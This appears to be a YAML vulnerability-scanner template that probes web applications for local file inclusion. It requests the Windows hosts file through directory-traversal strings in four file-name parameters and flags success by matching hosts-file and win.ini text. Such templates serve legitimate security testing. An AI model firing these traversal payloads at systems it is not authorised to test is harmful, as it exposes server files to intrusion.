id: lfi-via-spider

info:
  name: Local File Inclusion
  author: reewardius
  severity: high
  tags: fuzzing-lfi,fuzzing-req
  
http:
  - method: GET
    path:
      - "{{BaseURL}}&file=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&fileName=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&filename=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      
    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "sample HOSTS file"
          - "[fonts]"
          - "[extensions]"
          - "[mci extensions]"